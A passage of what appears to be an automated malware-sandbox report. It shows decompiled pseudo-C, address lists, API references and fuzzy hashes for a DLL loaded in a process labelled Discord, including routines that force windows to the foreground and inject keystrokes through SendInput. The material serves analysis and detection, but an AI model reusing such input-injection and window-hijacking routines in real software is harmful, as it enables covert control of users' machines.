																		__ebx =  *0x6de9e7d8;
																	}
																	 *__esp = __ebx;
																	_v52 = 0;
																	_v56 = __esi;
																	__eax = E6DE95320();
																	__eflags = __eax - __esi;
																	__ebx = __eax;
																	__edi =  *0x6de9e7dc;
																	if(__eax != __esi) {
																		__edx =  *0x6de9e7dc;
																		__eflags = __edx - __esi;
																		if(__edx == __esi) {
																			__edx = 0;
																		} else {
																			__edx = __edx - __esi;
																			__edx = __edx >> 2;
																			__eflags = __edx >> 2;
																			if(__edx >> 2 != 0) {
																				__eax = memmove(__ebx, __esi, __edx);
																				__edx =  *0x6de9e7dc;
																				__edx =  *0x6de9e7dc - __esi;
																			}
																		}
																		__edx = __ebx + __edx;
																		__eflags = __edx;
																		 *0x6de9e7dc = __edx;
																		__edi = __edx;
																	}
																	__esi =  *0x6de9e7d8;
																	__edi = __edi - __esi;
																	__eax = __edi - __esi >> 2;
																	__eflags = __eax;
																	if(__eax != 0) {
																		goto L60;
																	} else {
																		__eax =  *0x6de9e814;
																	}
																	goto L48;
																} else {
																	__eax =  *0x6de9e7d8;
																	 *0x6de9e7dc =  *0x6de9e7d8;
																	__eax =  *0x6de9e7fc;
																	 *0x6de9e800 =  *0x6de9e7fc;
																}
																L13:
																__eax = 0x6de9e87c->left;
																asm("fnstcw word [esp+0x5e]");
																__edx = _a94 & 0x0000ffff;
																__ecx =  *0x6de9e888;
																_a40 = __eax;
																asm("fild dword [esp+0x28]");
																_a92 = __dx;
																__edx =  *0x6de9e880;
																asm("fsubr dword [0x6de9814c]");
																__ecx =  *0x6de9e888 - __edx;
																__ecx =  *0x6de9e888 - __edx - 0x32;
																__eflags = __ecx;
																_a40 = __ecx;
																_a32 = _a32 / st0;
																asm("fxch st0, st1");
																asm("fldcw word [esp+0x5c]");
																asm("fistp dword [esp+0x58]");
																asm("fldcw word [esp+0x5e]");
																__ebx = _a88;
																asm("fild dword [esp+0x28]");
																_a40 = __edx;
																_a48 = __ebx;
																asm("fsubr qword [0x6de9e790]");
																asm("fild dword [esp+0x28]");
																_a40 = 1;
																asm("fsubp st1, st0");
																__fp0 = _a32 / st0 / st1;
																asm("fldcw word [esp+0x5c]");
																asm("fistp dword [esp+0x58]");
																asm("fldcw word [esp+0x5e]");
																__edi = _a88;
																asm("fld1");
																asm("fxch st0, st1");
																__esi = __edi;
																asm("fucomip st0, st1");
																st0 = __fp0;
																if(__ecx >= 0) {
																	while(1) {
																		L17:
																		__ecx =  *0x6de9e814;
																		__eax = __ebx + __eax;
																		__edx = __esi + __edx;
																		 *0x6de9e894 = __eax;
																		 *0x6de9e898 = __edx;
																		__eflags =  *0x6de9e814;
																		if( *0x6de9e814 == 0) {
																			_a8 = __eax;
																			__eax =  *0x6de9e868;
																			_a24 = 1;
																			_a20 = 0;
																			_a16 = 0;
																			_a12 = __edx;
																			_a4 = 0xffffffff;
																			_v0 =  *0x6de9e868;
																			__eax = _a44();
																			__esp = __esp - 0x1c;
																		}
																		_v0 = 1;
																		__esi = __esi + __edi;
																		Sleep(??);
																		__esp = __esp - 4;
																		_a40 = _a40 + 1;
																		__ebx = __ebx + _a48;
																		__eflags = __ebx;
																		asm("fild dword [esp+0x28]");
																		__fp0 = _a32;
																		asm("fucomip st0, st1");
																		st0 = __fp0;
																		if(__ebx < 0) {
																			goto L19;
																		}
																		L16:
																		__eax = 0x6de9e87c->left;
																		__edx =  *0x6de9e880;
																	}
																}
																goto L19;
															}
														}
													} else {
														__eax = _a52;
														_v0 = _a52;
														L6DE8DD20();
														__eax = _a56;
														_v0 = _a56;
														L6DE8DD20();
														__eax =  *0x6de9e760;
														__eflags = __eax - 1;
														_a60 = __eax;
														if(__eax == 1) {
															L71:
															__eax = E6DE8A200();
															L1:
															return _a60;
														} else {
															_a60 = 1;
															__eax = _a60;
															__esp =  &(__esp[0x33]);
															_pop(__ebx);
															_pop(__esi);
															_pop(__edi);
															return _a60;
														}
													}
												}
											} else {
												__ecx =  *0x6de9e814;
												__eflags =  *0x6de9e814;
												if( *0x6de9e814 == 0) {
													__eax =  *0x6de9e868;
													_a4 = __eax;
													_v0 = __eax;
													L6DE8DC60();
													Sleep(0x64);
													__esp = __esp - 4;
													__eax = FindWindowA(0, __edi);
													__esp = __esp - 8;
													__eflags = __eax;
													if(__eax != 0) {
														__eax =  *0x6de9e868;
														_a4 = __eax;
														_v0 = __eax;
														L6DE8DC68();
													}
												}
												Sleep(0x3e8);
												__esp = __esp - 4;
												_t86 =  &_a40;
												 *_t86 = _a40 - 1;
												__eflags =  *_t86;
												if( *_t86 != 0) {
													continue;
												} else {
													goto L27;
												}
											}
										}
									}
								}
							}
							_a56 = __edi;
							goto L67;
						}
					}
					L74:
					__eax =  *0x6de9e814;
					__esi = __edi;
					goto L48;
				}
			}

0x6de8d590
0x6de8d590
0x6de8d590
0x6de8d592
0x00000000
0x00000000
0x6de8d5a0
0x6de8d5a0
0x6de8d5a2
0x6de8d5a7
0x6de8d5ae
0x6de8d5b3
0x6de8d5b6
0x6de8d5b8
0x6de8d5c5
0x6de8d5cb
0x6de8d5ce
0x6de8d5d3
0x6de8d5d3
0x6de8d5e7
0x6de8d5ed
0x6de8d5f0
0x6de8d5f8
0x6de8d600
0x6de8d608
0x6de8d60b
0x6de8d611
0x6de8d611
0x6de8d614
0x6de8d617
0x6de8d61a
0x6de8d62d
0x6de8d633
0x6de8d636
0x6de8d63d
0x6de8d644
0x6de8d648
0x6de8d650
0x6de8d658
0x6de8d660
0x6de8d668
0x6de8d66d
0x6de8d670
0x6de8d674
0x6de8d678
0x6de8d67d
0x6de8d681
0x6de8d689
0x6de8d68e
0x6de8d695
0x6de8d69c
0x6de8d6a0
0x6de8d6a4
0x6de8d6aa
0x6de8d6ad
0x6de8d6af
0x6de8d6b3
0x6de8d6b7
0x6de8d6bb
0x6de8d6be
0x6de8d6be
0x6de8d6c6
0x6de8d6cb
0x6de8d4cc
0x6de8d4cc
0x6de8d4cc
0x6de8d4d2
0x6de8d4d4
0x6de8d4da
0x6de8d4e0
0x6de8d4f6
0x6de8d4fc
0x6de8d4fc
0x6de8cfe4
0x6de8cfe4
0x6de8cfe4
0x6de8cfe9
0x6de8cfed
0x6de8cff2
0x6de8cff8
0x6de8cffc
0x6de8d002
0x6de8d007
0x6de8d00d
0x6de8d013
0x6de8d015
0x6de8d015
0x6de8d018
0x6de8d020
0x6de8d022
0x6de8d024
0x6de8d028
0x6de8d02c
0x6de8d030
0x6de8d034
0x6de8d038
0x6de8d03c
0x6de8d040
0x6de8d046
0x6de8d04a
0x6de8d052
0x6de8d054
0x6de8d056
0x6de8d05a
0x6de8d05e
0x6de8d062
0x6de8d066
0x6de8d068
0x6de8d06a
0x6de8d06c
0x6de8d06e
0x6de8d070
0x6de8d0b0
0x6de8d0b0
0x6de8d0b0
0x6de8d0b6
0x6de8d0b8
0x6de8d0ba
0x6de8d0bf
0x6de8d0c5
0x6de8d0c7
0x6de8d0c9
0x6de8d0cd
0x6de8d0d2
0x6de8d0da
0x6de8d0e2
0x6de8d0ea
0x6de8d0ee
0x6de8d0f6
0x6de8d0f9
0x6de8d0fd
0x6de8d0fd
0x6de8d080
0x6de8d087
0x6de8d089
0x6de8d08b
0x6de8d08e
0x6de8d093
0x6de8d093
0x6de8d097
0x6de8d09b
0x6de8d09f
0x6de8d0a1
0x6de8d0a3
0x00000000
0x00000000
0x6de8d0a5
0x6de8d0a5
0x6de8d0aa
0x6de8d0aa
0x6de8d0b0
0x6de8d072
0x6de8d105
0x6de8d105
0x6de8d10a
0x6de8d10f
0x6de8d112
0x6de8d117
0x6de8d11d
0x6de8d121
0x6de8d125
0x6de8d125
0x6de8d12b
0x6de8d12d
0x00000000
0x00000000
0x6de8d13a
0x6de8d13c
0x6de8d13f
0x6de8d142
0x6de8d147
0x6de8d14f
0x6de8d155
0x6de8d155
0x6de8d158
0x6de8d15b
0x6de8d15e
0x6de8d163
0x6de8d167
0x6de8d169
0x6de8d16e
0x6de8d172
0x6de8d17b
0x6de8d180
0x6de8d186
0x6de8d188
0x6de8d18b
0x6de8d18d
0x6de8d2a4
0x6de8d2a4
0x6de8d2ab
0x6de8d2af
0x6de8d7a1
0x6de8d7a1
0x6de8d2b5
0x6de8d2b9
0x6de8d2bc
0x6de8d2c1
0x6de8d2c5
0x6de8d2c8
0x6de8d2cd
0x00000000
0x6de8d193
0x6de8d19e
0x6de8d1a3
0x6de8d1a5
0x00000000
0x6de8d1ab
0x6de8d1b6
0x6de8d1bb
0x6de8d1bd
0x00000000
0x6de8d1c3
0x6de8d1c3
0x6de8d1ce
0x6de8d1d3
0x6de8d1d5
0x6de8d1f8
0x6de8d1f8
0x6de8d1fd
0x6de8d201
0x6de8d203
0x6de8d701
0x6de8d701
0x6de8d705
0x6de8d708
0x6de8d70d
0x6de8d711
0x6de8d714
0x6de8d719
0x00000000
0x6de8d209
0x6de8d209
0x6de8d209
0x6de8d209
0x6de8d20e
0x6de8ccdb
0x6de8ccdd
0x6de8cce1
0x6de8cce8
0x6de8ccf0
0x6de8ccf4
0x6de8ccf8
0x6de8ccfc
0x6de8cd00
0x6de8cd04
0x6de8cd08
0x6de8cd0c
0x6de8cd18
0x6de8cd1a
0x6de8cd20
0x6de8cd23
0x6de8cd25
0x6de8d761
0x6de8d761
0x6de8d765
0x6de8d768
0x6de8d76d
0x6de8d771
0x6de8d774
0x6de8d779
0x6de8d780
0x6de8d78a
0x00000000
0x00000000
0x00000000
0x6de8cd2b
0x6de8cd2b
0x6de8cd2f
0x6de8cd31
0x00000000
0x6de8cd37
0x6de8cd37
0x6de8cd3b
0x6de8cd3e
0x6de8cd43
0x6de8cd4b
0x6de8cd51
0x6de8cd51
0x6de8cd54
0x6de8cd57
0x6de8cd5a
0x6de8cd5f
0x6de8cd63
0x6de8cd67
0x6de8cd6c
0x6de8cd70
0x6de8cd79
0x6de8cd7e
0x6de8cd81
0x6de8cd84
0x6de8cd90
0x6de8cd92
0x6de8cd97
0x6de8cd9a
0x6de8cd9d
0x6de8cda2
0x6de8cda8
0x6de8cdaa
0x6de8d514
0x6de8d51a
0x6de8d51a
0x6de8cdb0
0x6de8cdb4
0x6de8cdb8
0x6de8cdbd
0x6de8cdc4
0x6de8cdca
0x6de8cdcf
0x6de8cdd5
0x6de8cddb
0x6de8cde1
0x6de8cde7
0x6de8cde9
0x6de8cdeb
0x6de8cdef
0x6de8cdf3
0x6de8cdfb
0x6de8cdff
0x6de8ce05
0x6de8ce0b
0x6de8ce11
0x6de8ce13
0x6de8ce15
0x6de8ce19
0x6de8ce1d
0x6de8ce21
0x6de8ce25
0x6de8ce27
0x6de8ce2a
0x6de8ce2c
0x6de8ce30
0x6de8ce32
0x6de8ce34
0x6de8ced8
0x6de8cedd
0x6de8ce3a
0x6de8ce3a
0x6de8ce3f
0x6de8ce41
0x6de8ce45
0x6de8ce4d
0x6de8ce78
0x6de8ce78
0x6de8ce7d
0x6de8ce83
0x6de8ce89
0x6de8ce8b
0x6de8ce8d
0x6de8ce8f
0x6de8ce94
0x6de8ce9a
0x6de8ce9c
0x6de8cea0
0x6de8cea5
0x6de8cead
0x6de8ceb5
0x6de8cebd
0x6de8cec1
0x6de8cec9
0x6de8cecc
0x6de8ced0
0x6de8ced0
0x6de8ce53
0x6de8ce5a
0x6de8ce5c
0x6de8ce5e
0x6de8ce61
0x6de8ce66
0x6de8ce66
0x6de8ce6a
0x6de8ce6e
0x6de8ce72
0x6de8ce74
0x6de8ce74
0x6de8ce78
0x6de8cee1
0x6de8cee5
0x6de8cee9
0x6de8ceee
0x6de8cef6
0x6de8cefe
0x6de8cf02
0x6de8cf0a
0x6de8cf14
0x6de8cf19
0x6de8cf1f
0x6de8cf25
0x6de8cf29
0x6de8cf2d
0x6de8cf31
0x6de8cf35
0x6de8cf39
0x6de8cf3e
0x6de8cf42
0x6de8cf47
0x6de8cf4b
0x6de8cf4e
0x6de8cf54
0x6de8cf5a
0x6de8cf5e
0x6de8cf62
0x6de8cf66
0x6de8cf6a
0x6de8cf70
0x6de8cf78
0x6de8cf7d
0x6de8cf80
0x6de8cf86
0x6de8cf8e
0x6de8cf95
0x6de8cf9a
0x6de8cf9f
0x6de8cfa4
0x6de8cfa6
0x6de8cfb0
0x6de8cfb2
0x6de8cfb7
0x6de8cfba
0x6de8cfbd
0x6de8cfc2
0x6de8cfc8
0x6de8cfca
0x6de8d2e7
0x6de8d2e9
0x6de8d2ec
0x6de8d319
0x6de8d31b
0x6de8d325
0x6de8d327
0x6de8d351
0x6de8d353
0x6de8d35d
0x6de8d35f
0x6de8d389
0x6de8d38b
0x6de8d395
0x6de8d397
0x6de8d3c1
0x6de8d3c3
0x6de8d3c6
0x6de8d3d2
0x6de8d3d4
0x6de8d3d7
0x6de8d3e6
0x6de8d3e8
0x6de8d409
0x6de8d409
0x6de8d40f
0x6de8d411
0x00000000
0x00000000
0x6de8d3f0
0x6de8d3ff
0x6de8d401
0x6de8d404
0x6de8d404
0x6de8d407
0x00000000
0x00000000
0x00000000
0x6de8d407
0x6de8d413
0x6de8d419
0x6de8d41f
0x6de8d421
0x6de8d75a
0x6de8d427
0x6de8d427
0x6de8d429
0x6de8d42e
0x6de8d430
0x6de8d434
0x6de8d437
0x6de8d43a
0x6de8d43d
0x6de8d43f
0x6de8d441
0x6de8d443
0x6de8d448
0x6de8d44b
0x6de8d522
0x6de8d525
0x6de8d531
0x6de8d536
0x6de8d538
0x00000000
0x6de8d53e
0x6de8d53e
0x6de8d540
0x6de8d543
0x6de8d546
0x6de8d548
0x00000000
0x6de8d54a
0x6de8d578
0x6de8d578
0x6de8d57a
0x6de8d57d
0x6de8d57f
0x6de8d581
0x6de8d56c
0x6de8d56c
0x6de8d56e
0x6de8d571
0x6de8d574
0x6de8d576
0x6de8d552
0x6de8d552
0x6de8d552
0x6de8d555
0x6de8d558
0x6de8d55b
0x6de8d55d
0x00000000
0x00000000
0x6de8d550
0x6de8d550
0x6de8d55f
0x6de8d562
0x6de8d564
0x6de8d566
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6de8d583
0x00000000
0x6de8d583
0x6de8d581
0x6de8d548
0x6de8d4cc
0x6de8d4cc
0x6de8d4d2
0x6de8d4d4
0x6de8d4da
0x6de8d4e0
0x6de8d4f6
0x6de8d4fc
0x6de8d4fc
0x00000000
0x6de8d451
0x6de8d451
0x6de8d45d
0x6de8d45d
0x6de8d462
0x6de8d462
0x6de8d468
0x6de8d468
0x6de8d46e
0x6de8d471
0x6de8d476
0x6de8d47a
0x6de8d47f
0x6de8d481
0x6de8d483
0x6de8d489
0x6de8d48b
0x6de8d491
0x6de8d493
0x6de8d79a
0x6de8d499
0x6de8d499
0x6de8d49d
0x6de8d4a0
0x6de8d4a2
0x6de8d748
0x6de8d74d
0x6de8d753
0x6de8d753
0x6de8d4a2
0x6de8d4a8
0x6de8d4a8
0x6de8d4aa
0x6de8d4b0
0x6de8d4b0
0x6de8d4b2
0x6de8d4ba
0x6de8d4bc
0x6de8d4bf
0x6de8d4c1
0x00000000
0x6de8d4c7
0x6de8d4c7
0x6de8d4c7
0x00000000
0x6de8cfd0
0x6de8cfd0
0x6de8cfd5
0x6de8cfda
0x6de8cfdf
0x6de8cfdf
0x6de8cfe4
0x6de8cfe4
0x6de8cfe9
0x6de8cfed
0x6de8cff2
0x6de8cff8
0x6de8cffc
0x6de8d002
0x6de8d007
0x6de8d00d
0x6de8d013
0x6de8d015
0x6de8d015
0x6de8d018
0x6de8d020
0x6de8d022
0x6de8d024
0x6de8d028
0x6de8d02c
0x6de8d030
0x6de8d034
0x6de8d038
0x6de8d03c
0x6de8d040
0x6de8d046
0x6de8d04a
0x6de8d052
0x6de8d054
0x6de8d056
0x6de8d05a
0x6de8d05e
0x6de8d062
0x6de8d066
0x6de8d068
0x6de8d06a
0x6de8d06c
0x6de8d06e
0x6de8d070
0x6de8d0b0
0x6de8d0b0
0x6de8d0b0
0x6de8d0b6
0x6de8d0b8
0x6de8d0ba
0x6de8d0bf
0x6de8d0c5
0x6de8d0c7
0x6de8d0c9
0x6de8d0cd
0x6de8d0d2
0x6de8d0da
0x6de8d0e2
0x6de8d0ea
0x6de8d0ee
0x6de8d0f6
0x6de8d0f9
0x6de8d0fd
0x6de8d0fd
0x6de8d080
0x6de8d087
0x6de8d089
0x6de8d08b
0x6de8d08e
0x6de8d093
0x6de8d093
0x6de8d097
0x6de8d09b
0x6de8d09f
0x6de8d0a1
0x6de8d0a3
0x00000000
0x00000000
0x6de8d0a5
0x6de8d0a5
0x6de8d0aa
0x6de8d0aa
0x6de8d0b0
0x00000000
0x6de8d070
0x6de8cd31
0x6de8d214
0x6de8d214
0x6de8d218
0x6de8d21b
0x6de8d220
0x6de8d224
0x6de8d227
0x6de8d22c
0x6de8d231
0x6de8d234
0x6de8d238
0x6de8d790
0x6de8d790
0x6de8cb9c
0x6de8cbaa
0x6de8d23e
0x6de8d23e
0x6de8d246
0x6de8d24a
0x6de8d250
0x6de8d251
0x6de8d252
0x6de8d254
0x6de8d254
0x6de8d238
0x6de8d20e
0x6de8d1d7
0x6de8d1d7
0x6de8d1dd
0x6de8d1df
0x6de8d255
0x6de8d25a
0x6de8d25e
0x6de8d261
0x6de8d26d
0x6de8d26f
0x6de8d27d
0x6de8d283
0x6de8d286
0x6de8d288
0x6de8d28e
0x6de8d293
0x6de8d297
0x6de8d29a
0x6de8d29a
0x6de8d288
0x6de8d1e8
0x6de8d1ea
0x6de8d1ed
0x6de8d1ed
0x6de8d1ed
0x6de8d1f2
0x00000000
0x00000000
0x00000000
0x00000000
0x6de8d1f2
0x6de8d1d5
0x6de8d1bd
0x6de8d1a5
0x6de8d18d
0x6de8d6fd
0x00000000
0x6de8d6fd
0x6de8cfe4
0x6de8d7ab
0x6de8d7ab
0x6de8d7b0
0x00000000
0x6de8d7b0

APIs

_ZNKSs7compareEPKc.LIBSTDC++-6 ref: 6DE8D5AE
GetWindowLongA.USER32 ref: 6DE8D5C5
SetWindowLongA.USER32 ref: 6DE8D5E7
SetLayeredWindowAttributes.USER32 ref: 6DE8D60B
_Z21ForceForegroundWindowP6HWND__.DFO1 ref: 6DE8D61A
GetWindowRect.USER32 ref: 6DE8D62D

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Window$Long$AttributesForceForegroundLayeredRectSs7compare
String ID:
API String ID: 1327741839-0
Opcode ID: d62f04b2d053871c65711bfc16475b15d8301171e0dfd502e973faa17bd5f51e
Instruction ID: ffd273b13a866978fc844fab41ddc2aa60d131cef1303af09ac091337f6ed152
Opcode Fuzzy Hash: d62f04b2d053871c65711bfc16475b15d8301171e0dfd502e973faa17bd5f51e
Instruction Fuzzy Hash: 663112B04097028FD720AF69C58831EBBF0BBC5714F108A2DE8D9DB285EB759448CB93

Uniqueness

Uniqueness Score: -1.00%

Function 6DE82717 Relevance: 9.1, APIs: 6, Instructions: 72keyboardCOMMON

Download Yara Rule

APIs

_Z6Decre1P6HWND__ii.DFO1 ref: 6DE82507
MapVirtualKeyA.USER32 ref: 6DE8254A
MapVirtualKeyA.USER32 ref: 6DE8257D
MapVirtualKeyA.USER32 ref: 6DE825B0
MapVirtualKeyA.USER32 ref: 6DE825DE
SendInput.USER32 ref: 6DE82607

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Virtual$D__iiDecre1InputSend
String ID:
API String ID: 2708597359-0
Opcode ID: 65b3847faeb10199b080da1f568f32bd86d07f59ec8ee67d408b2f525d411c4b
Instruction ID: 1755ff8d44298b733d3b16b38537ad924efc8679d19dcb98131d7f4b7f6bc478
Opcode Fuzzy Hash: 65b3847faeb10199b080da1f568f32bd86d07f59ec8ee67d408b2f525d411c4b
Instruction Fuzzy Hash: C431EEB0119741CAE7109F61D54834ABBF0BF85708F40492DE9D89B294E3BA88989B57

Uniqueness

Uniqueness Score: -1.00%

Function 6DE81A89 Relevance: 9.1, APIs: 6, Instructions: 71COMMON

Download Yara Rule

APIs

_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE81B2D

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_destroyRep10_Ss4_
String ID:
API String ID: 418774267-0
Opcode ID: a930123a4d0a451230c3387eec65efbd2b622452d057f7c9e1ea5b9a0aeb41ca
Instruction ID: 192ed5e36f0795705cc4d4d7452b126c40c5b004b6b47e2aca9448507d4d2a2e
Opcode Fuzzy Hash: a930123a4d0a451230c3387eec65efbd2b622452d057f7c9e1ea5b9a0aeb41ca
Instruction Fuzzy Hash: E821817050AB028BC308EEBCC558619BBB4EB82265B514B3ED969C71C1FF26D5058B82

Uniqueness

Uniqueness Score: -1.00%

Function 6DE93900 Relevance: 9.0, APIs: 6, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE93900(intOrPtr __eax, void* __ecx) {
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char* _v36;
				intOrPtr _v40;
				char* _t26;
				char* _t27;
				char* _t28;
				char* _t29;
				char* _t30;
				void* _t34;
				intOrPtr* _t35;

				_t35 = _t34 - 0x20;
				_v40 = 0;
				 *_t35 = 0;
				_v36 =  &_v13;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x20)) = __eax;
				_t26 =  &_v18;
				_v40 = 0;
				 *_t35 = 0;
				_v36 = _t26;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x30)) = _t26;
				_t27 =  &_v17;
				_v40 = 0;
				 *_t35 = 0;
				_v36 = _t27;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x40)) = _t27;
				_t28 =  &_v16;
				_v40 = 0;
				 *_t35 = 0;
				_v36 = _t28;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x88)) = _t28;
				_t29 =  &_v15;
				_v40 = 0;
				 *_t35 = 0;
				_v36 = _t29;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x8c)) = _t29;
				_t30 =  &_v14;
				_v40 = 0;
				 *_t35 = 0;
				_v36 = _t30;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x90)) = _t30;
				return _t30;
			}

0x6de93905
0x6de9390c
0x6de93914
0x6de9391b
0x6de9391f
0x6de93924
0x6de93927
0x6de9392b
0x6de93933
0x6de9393a
0x6de9393e
0x6de93943
0x6de93946
0x6de9394a
0x6de93952
0x6de93959
0x6de9395d
0x6de93962
0x6de93965
0x6de93969
0x6de93971
0x6de93978
0x6de9397c
0x6de93981
0x6de93987
0x6de9398b
0x6de93993
0x6de9399a
0x6de9399e
0x6de939a3
0x6de939a9
0x6de939ad
0x6de939b5
0x6de939bc
0x6de939c0
0x6de939c5
0x6de939d1

APIs

_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE9391F
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE9393E
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE9395D
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE9397C
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE9399E
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE939C0

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: S_constructSs12_
String ID:
API String ID: 1916361505-0
Opcode ID: 9e25fed7a5224f390f95f5bfe9ea13fe48fad077ed9ba7bbba6104fcb74d0c68
Instruction ID: 1c76191543564a7a77ae29664912739fb5f9549b94741d4dddb5966028870aa0
Opcode Fuzzy Hash: 9e25fed7a5224f390f95f5bfe9ea13fe48fad077ed9ba7bbba6104fcb74d0c68
Instruction Fuzzy Hash: 4C117FB58093019FD701DF60C19479BBFE4FF84304F118A2EE9C88F285EB7985888B92

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8CB70 Relevance: 9.0, APIs: 6, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6DE8CB70() {
				intOrPtr _t16;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				void* _t35;
				intOrPtr* _t36;

				_t27 = _t16;
				 *_t36 = _t35 - 0x82;
				L6DE8DD48();
				 *_t36 = _t35 - 0x83;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t35 - 0x74)) - 0xc);
				 *_t36 = _t35 - 0x84;
				L6DE8DD48();
				_t24 = _t35 - 0x85;
				 *_t36 = _t24;
				L6DE8DD48();
				_push(_t24);
				while(1) {
					_t26 = _t35 - 0x86;
					 *_t36 = _t26;
					L6DE8DD48();
					_push(_t26);
					 *_t36 = _t27;
					L6DE8EBA0();
					_t27 = _t26;
				}
			}

0x6de8cb70
0x6de8cb38
0x6de8cb3b
0x6de8cb4d
0x6de8cb50
0x6de8cb55
0x6de8cb62
0x6de8cb65
0x6de8caad
0x6de8cab3
0x6de8cab6
0x6de8cabb
0x6de8cabc
0x6de8cac2
0x6de8cac8
0x6de8cacb
0x6de8cad0
0x6de8cad1
0x6de8cad4
0x6de8cad9
0x6de8cad9

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,?,00000000), ref: 6DE8CAB6
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,?,00000000), ref: 6DE8CACB
_Unwind_Resume.LIBGCC_S_DW2-1(00000000,00000000,?,?,?,00000000), ref: 6DE8CAD4
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000), ref: 6DE8CB3B
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000), ref: 6DE8CB50
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000), ref: 6DE8CB65

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
